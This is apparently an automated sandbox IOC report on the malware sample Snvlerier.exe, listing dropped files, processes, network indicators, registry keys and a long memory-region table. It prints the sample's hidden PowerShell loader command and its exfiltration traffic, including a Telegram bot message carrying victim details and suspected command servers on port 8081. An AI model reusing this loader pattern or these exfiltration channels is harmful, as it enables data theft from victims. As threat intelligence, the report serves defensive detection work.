IOC Report
Snvlerier.exe

loading gif

Files

File Path
Type
Category
Malicious
Snvlerier.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra
ASCII text, with very long lines (3071), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Snvlerier.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Snvlerier.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsm2DDB.tmp
DOS executable (COM)
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvuzjaxv.tnl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umhsxoy3.x4m.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1da112i.c50.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywbc4gwl.uzg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Ausubo.kno
data
dropped
C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Bygningselementer19.dok
data
dropped
C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\frihedsgodes.sto
PGP Secret Sub-key -
dropped
C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\jaevndoegn.ski
data
dropped
C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\prevailingness.txt
ASCII text, with CRLF line terminators
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Snvlerier.exe
"C:\Users\user\Desktop\Snvlerier.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Dictyoceratine=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\carinal\Coracosteon\Eftermles.Tra';$Ciceronian=$Dictyoceratine.SubString(53398,3);.$Ciceronian($Dictyoceratine)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://api.telegram.org
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2014/10/2024%20/%2014:08:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://drive.usercontent.google.com/Fp
unknown
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://contoso.com/Icon
unknown
https://drive.usercontent.google.com/Aq
unknown
https://www.office.com/H
unknown
https://drive.usercontent.google.com/
unknown
http://checkip.dyndns.org
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://reallyfreegeoip.org/xml/8.46.123.33
188.114.96.3
http://smtp.ionos.es
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a
unknown
https://chrome.google.com/webstore?hl=en
unknown
http://varders.kozow.com:8081
unknown
https://github.com/Pester/Pester
unknown
https://www.ionos.com/help/index.php?id=2425&ip=8.46.123.33&c=hd&r=1MPXMa-1tMkBm3Mnq-00Nj5b
unknown
http://aborters.duckdns.org:8081
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
193.122.130.0
http://nsis.sf.net/NSIS_Error
unknown
http://51.38.247.67:8081/_send_.php?L
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lB
unknown
https://reallyfreegeoip.org/xml/8.46.123.33$
unknown
http://anotherarmy.dns.army:8081
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://drive.google.com/HL
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
https://reallyfreegeoip.org
unknown
https://apis.google.com
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://drive.google.com/XL
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 36 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.96.3
malicious
smtp.ionos.es
213.165.67.118
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
drive.google.com
142.250.185.110
drive.usercontent.google.com
142.250.185.97
checkip.dyndns.com
193.122.130.0

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.96.3
reallyfreegeoip.org
European Union
malicious
213.165.67.118
smtp.ionos.es
Germany
malicious
193.122.130.0
checkip.dyndns.com
United States
142.250.185.110
drive.google.com
United States
142.250.185.97
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
93E6000
direct allocation
page execute and read and write
malicious
21501000
trusted library allocation
page read and write
malicious
2398D000
stack
page read and write
7ED0000
heap
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
22501000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
7C9000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
5700000
heap
page readonly
24140000
trusted library allocation
page read and write
6740000
direct allocation
page read and write
2AB5000
trusted library allocation
page execute and read and write
7EB0000
heap
page read and write
23A90000
trusted library allocation
page read and write
24214000
trusted library allocation
page read and write
236B0000
trusted library allocation
page read and write
85E000
stack
page read and write
242D0000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
20F3E000
stack
page read and write
24150000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
583A000
trusted library allocation
page read and write
24287000
trusted library allocation
page read and write
58B7000
heap
page read and write
24130000
trusted library allocation
page read and write
22692000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24180000
trusted library allocation
page execute and read and write
20EF0000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
6E60000
trusted library allocation
page read and write
235A0000
heap
page read and write
24140000
trusted library allocation
page read and write
422000
unkown
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
7070000
trusted library allocation
page read and write
21571000
trusted library allocation
page read and write
21340000
trusted library allocation
page read and write
2131C000
stack
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
6D66000
heap
page read and write
213E0000
heap
page read and write
219BA000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
5256000
remote allocation
page execute and read and write
7F4E0000
trusted library allocation
page execute and read and write
236A0000
trusted library allocation
page read and write
58B5000
heap
page read and write
46F3000
trusted library allocation
page read and write
218D4000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
75F000
stack
page read and write
23776000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
215BE000
trusted library allocation
page read and write
216ED000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
21350000
heap
page read and write
24210000
trusted library allocation
page read and write
6FDD000
stack
page read and write
6840000
heap
page execute and read and write
22854000
trusted library allocation
page read and write
2AA2000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23A0E000
stack
page read and write
23A90000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
6760000
direct allocation
page read and write
23A90000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
805B000
heap
page read and write
2834000
heap
page read and write
23A90000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
24290000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
409000
unkown
page read and write
24180000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
589E000
stack
page read and write
80D0000
trusted library allocation
page execute and read and write
23750000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
242A0000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
581D000
heap
page read and write
236B0000
trusted library allocation
page read and write
20E3D000
stack
page read and write
22895000
trusted library allocation
page read and write
7FE9000
heap
page read and write
480000
heap
page read and write
24140000
trusted library allocation
page read and write
22847000
trusted library allocation
page read and write
2155B000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
576A000
heap
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
6BBE000
stack
page read and write
24290000
trusted library allocation
page read and write
24180000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
21220000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page execute and read and write
235A1000
heap
page read and write
45FC000
stack
page read and write
5BE000
stack
page read and write
24150000
trusted library allocation
page read and write
2121E000
stack
page read and write
242B0000
trusted library allocation
page read and write
7030000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
8070000
heap
page read and write
236B0000
trusted library allocation
page read and write
24180000
trusted library allocation
page read and write
22598000
trusted library allocation
page read and write
66F0000
direct allocation
page read and write
19A000
stack
page read and write
7BC0000
trusted library allocation
page read and write
22772000
trusted library allocation
page read and write
2264A000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
5840000
trusted library allocation
page read and write
24170000
trusted library allocation
page read and write
21711000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
6EE000
heap
page read and write
2184B000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
236B0000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
581A000
heap
page read and write
216DF000
trusted library allocation
page read and write
434000
unkown
page readonly
57DC000
heap
page read and write
227F2000
trusted library allocation
page read and write
2105000
heap
page read and write
24120000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
242A0000
trusted library allocation
page read and write
236B0000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
2262D000
trusted library allocation
page read and write
24280000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
225B8000
trusted library allocation
page read and write
7E5000
trusted library allocation
page execute and read and write
57DF000
heap
page read and write
2250B000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
434000
unkown
page readonly
236A0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
6910000
heap
page read and write
23750000
trusted library allocation
page read and write
213A0000
trusted library allocation
page read and write
7EE5000
heap
page read and write
22779000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
225BE000
trusted library allocation
page read and write
6FF0000
trusted library allocation
page execute and read and write
88F0000
direct allocation
page execute and read and write
7FF7000
heap
page read and write
227F4000
trusted library allocation
page read and write
6E0000
heap
page read and write
400000
unkown
page readonly
24262000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24290000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
215A6000
trusted library allocation
page read and write
57D9000
heap
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
2260D000
trusted library allocation
page read and write
22651000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
6730000
direct allocation
page read and write
23750000
trusted library allocation
page read and write
47E6000
trusted library allocation
page read and write
7C0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
5A70000
direct allocation
page read and write
6E50000
trusted library allocation
page read and write
6710000
direct allocation
page read and write
225D5000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
242A0000
trusted library allocation
page read and write
2A83000
trusted library allocation
page execute and read and write
22822000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
710B000
stack
page read and write
23760000
trusted library allocation
page read and write
2274000
heap
page read and write
20DBF000
stack
page read and write
21248000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
6845000
heap
page execute and read and write
7E50000
trusted library allocation
page read and write
227D1000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
5CE000
stack
page read and write
24120000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
760000
heap
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24290000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
225E1000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24220000
trusted library allocation
page execute and read and write
21930000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
24150000
trusted library allocation
page execute and read and write
749000
heap
page read and write
24140000
trusted library allocation
page read and write
6C32000
heap
page read and write
225ED000
trusted library allocation
page read and write
2278C000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
25FE000
stack
page read and write
23A90000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
24130000
trusted library allocation
page execute and read and write
746000
heap
page read and write
24180000
trusted library allocation
page read and write
401000
unkown
page execute read
96000
stack
page read and write
57C7000
heap
page read and write
6FE0000
trusted library allocation
page read and write
214C4000
heap
page read and write
20C0000
heap
page read and write
2A8D000
trusted library allocation
page execute and read and write
23A90000
trusted library allocation
page read and write
20990000
direct allocation
page read and write
22760000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
7D25000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
21230000
heap
page read and write
7EBA000
heap
page read and write
56B9000
trusted library allocation
page read and write
5760000
heap
page read and write
209A0000
direct allocation
page read and write
6F9E000
stack
page read and write
5853000
heap
page read and write
23750000
trusted library allocation
page read and write
70C0000
trusted library allocation
page read and write
581A000
heap
page read and write
7B80000
heap
page read and write
24140000
trusted library allocation
page read and write
2394E000
stack
page read and write
620000
heap
page read and write
6EB0000
direct allocation
page execute and read and write
236C0000
trusted library allocation
page read and write
2159E000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
241E0000
trusted library allocation
page execute and read and write
23750000
trusted library allocation
page read and write
3370000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
7F8D000
heap
page read and write
24140000
trusted library allocation
page read and write
21482000
heap
page read and write
24120000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
659000
heap
page read and write
2285F000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
66E0000
direct allocation
page read and write
24140000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
7F2E000
heap
page read and write
C60000
trusted library allocation
page read and write
582E000
trusted library allocation
page read and write
22785000
trusted library allocation
page read and write
242C0000
trusted library allocation
page execute and read and write
7EE9000
heap
page read and write
23760000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
21240000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
20960000
direct allocation
page read and write
23750000
trusted library allocation
page read and write
213BA000
trusted library allocation
page read and write
581A000
heap
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
20D20000
heap
page read and write
24120000
trusted library allocation
page read and write
7EED000
heap
page read and write
24200000
trusted library allocation
page read and write
215B6000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
4438000
trusted library allocation
page read and write
7A94000
stack
page read and write
6D20000
heap
page read and write
6ED0000
heap
page execute and read and write
70B0000
trusted library allocation
page read and write
2115A000
stack
page read and write
6D56000
heap
page read and write
213CD000
trusted library allocation
page read and write
24290000
trusted library allocation
page read and write
21100000
direct allocation
page read and write
24210000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
2100000
heap
page read and write
236C0000
trusted library allocation
page read and write
6AF000
heap
page read and write
560000
heap
page read and write
24140000
trusted library allocation
page read and write
22851000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
7090000
trusted library allocation
page read and write
73C000
heap
page read and write
7AB0000
trusted library allocation
page execute and read and write
4680000
heap
page execute and read and write
790000
trusted library section
page read and write
2AA6000
trusted library allocation
page execute and read and write
57AD000
heap
page read and write
581A000
heap
page read and write
24120000
trusted library allocation
page read and write
729000
heap
page read and write
57D000
stack
page read and write
215E5000
trusted library allocation
page read and write
2144B000
heap
page read and write
5A60000
direct allocation
page read and write
888000
heap
page read and write
7BE0000
trusted library allocation
page read and write
64D000
heap
page read and write
448C000
stack
page read and write
22793000
trusted library allocation
page read and write
40B000
unkown
page read and write
22529000
trusted library allocation
page read and write
214A6000
heap
page read and write
215BA000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
32B0000
heap
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
213C1000
trusted library allocation
page read and write
215A2000
trusted library allocation
page read and write
800000
heap
page read and write
23750000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
216E7000
trusted library allocation
page read and write
7EE1000
heap
page read and write
24120000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
56F0000
heap
page read and write
6F5E000
stack
page read and write
23750000
trusted library allocation
page read and write
7050000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
81E000
stack
page read and write
2258F000
trusted library allocation
page read and write
24160000
trusted library allocation
page read and write
2195E000
trusted library allocation
page read and write
216C1000
trusted library allocation
page read and write
2A84000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
59CE000
stack
page read and write
22795000
trusted library allocation
page read and write
24210000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
213BE000
trusted library allocation
page read and write
57D9000
heap
page read and write
7EB8000
heap
page read and write
22762000
trusted library allocation
page read and write
24170000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
213AB000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
450000
heap
page read and write
24140000
trusted library allocation
page read and write
2283C000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
2A80000
trusted library allocation
page read and write
6CF000
stack
page read and write
24220000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
585000
heap
page read and write
2AB2000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
582C000
heap
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
2258C000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
463E000
stack
page read and write
24170000
trusted library allocation
page execute and read and write
7B3000
trusted library allocation
page execute and read and write
23750000
trusted library allocation
page read and write
80F0000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
9DE6000
direct allocation
page execute and read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
2149E000
heap
page read and write
24150000
trusted library allocation
page read and write
2109000
heap
page read and write
24140000
trusted library allocation
page read and write
23A4F000
stack
page read and write
6EA0000
trusted library allocation
page read and write
21197000
stack
page read and write
24200000
trusted library allocation
page read and write
7E2E000
stack
page read and write
22857000
trusted library allocation
page read and write
6E90000
trusted library allocation
page read and write
401000
unkown
page execute read
236B0000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
2A70000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
210AE000
stack
page read and write
24120000
trusted library allocation
page read and write
236B0000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
21719000
trusted library allocation
page read and write
5A87000
heap
page read and write
23774000
trusted library allocation
page read and write
8024000
heap
page read and write
23750000
trusted library allocation
page read and write
440000
heap
page read and write
88CB000
stack
page read and write
209C0000
direct allocation
page read and write
7B90000
heap
page read and write
23750000
trusted library allocation
page read and write
400000
unkown
page readonly
6700000
direct allocation
page read and write
2AAA000
trusted library allocation
page execute and read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
7F41000
heap
page read and write
23750000
trusted library allocation
page read and write
6E27000
trusted library allocation
page read and write
24160000
trusted library allocation
page execute and read and write
236A0000
trusted library allocation
page read and write
20F0000
heap
page read and write
242A0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
7B7E000
stack
page read and write
2198C000
trusted library allocation
page read and write
2100C000
stack
page read and write
23A90000
trusted library allocation
page read and write
21818000
trusted library allocation
page read and write
6E80000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
7060000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
740000
heap
page read and write
24120000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
67C0000
direct allocation
page read and write
429000
unkown
page read and write
216E5000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
242D0000
trusted library allocation
page read and write
213A6000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
209B0000
direct allocation
page read and write
23750000
trusted library allocation
page read and write
706000
heap
page read and write
214F0000
heap
page execute and read and write
23750000
trusted library allocation
page read and write
2174A000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
24260000
trusted library allocation
page read and write
241F0000
trusted library allocation
page read and write
214E000
stack
page read and write
5826000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
2289C000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
5750000
direct allocation
page read and write
22878000
trusted library allocation
page read and write
236B0000
trusted library allocation
page read and write
7AA0000
heap
page read and write
23A90000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
20D7E000
stack
page read and write
2AB0000
trusted library allocation
page read and write
225CE000
trusted library allocation
page read and write
57DF000
heap
page read and write
7E0000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24200000
trusted library allocation
page read and write
880000
heap
page read and write
21070000
remote allocation
page read and write
24140000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
7AD0000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
242B0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
800F000
heap
page read and write
24150000
trusted library allocation
page read and write
20EBF000
stack
page read and write
21693000
trusted library allocation
page read and write
236C0000
heap
page read and write
6E9000
heap
page read and write
23760000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
2AA0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24180000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
236B0000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
58B0000
heap
page read and write
225EF000
trusted library allocation
page read and write
24236000
trusted library allocation
page read and write
432000
unkown
page read and write
23780000
heap
page execute and read and write
21879000
trusted library allocation
page read and write
22707000
trusted library allocation
page read and write
24160000
trusted library allocation
page read and write
57D2000
heap
page read and write
23A90000
trusted library allocation
page read and write
18C000
stack
page read and write
2154F000
trusted library allocation
page read and write
20E7E000
stack
page read and write
44CE000
stack
page read and write
244D0000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
409000
unkown
page write copy
24120000
trusted library allocation
page read and write
22523000
trusted library allocation
page read and write
235A1000
heap
page read and write
24150000
trusted library allocation
page read and write
22836000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page execute and read and write
242B0000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24180000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
24150000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
22780000
trusted library allocation
page read and write
24140000
trusted library allocation
page read and write
2139E000
stack
page read and write
236A0000
trusted library allocation
page read and write
780000
trusted library section
page read and write
226AA000
trusted library allocation
page read and write
24130000
trusted library allocation
page read and write
69C000
heap
page read and write
6E0000
heap
page read and write
24140000
trusted library allocation
page read and write
21070000
remote allocation
page read and write
21579000
trusted library allocation
page read and write
7A0000
trusted library allocation
page read and write
451E000
stack
page read and write
213C6000
trusted library allocation
page read and write
23750000
trusted library allocation
page read and write
216E3000
trusted library allocation
page read and write
7DEE000
stack
page read and write
467E000
stack
page read and write
23751000
trusted library allocation
page read and write
236A0000
trusted library allocation
page read and write
24120000
trusted library allocation
page read and write
23A90000
trusted library allocation
page read and write
580000
heap
page read and write
31AE000
stack
page read and write
242A0000
trusted library allocation
page read and write
88E0000
trusted library allocation
page execute and read and write
214AD000
heap
page read and write
23770000
trusted library allocation
page read and write
4530000
heap
page read and write
24140000
trusted library allocation
page read and write
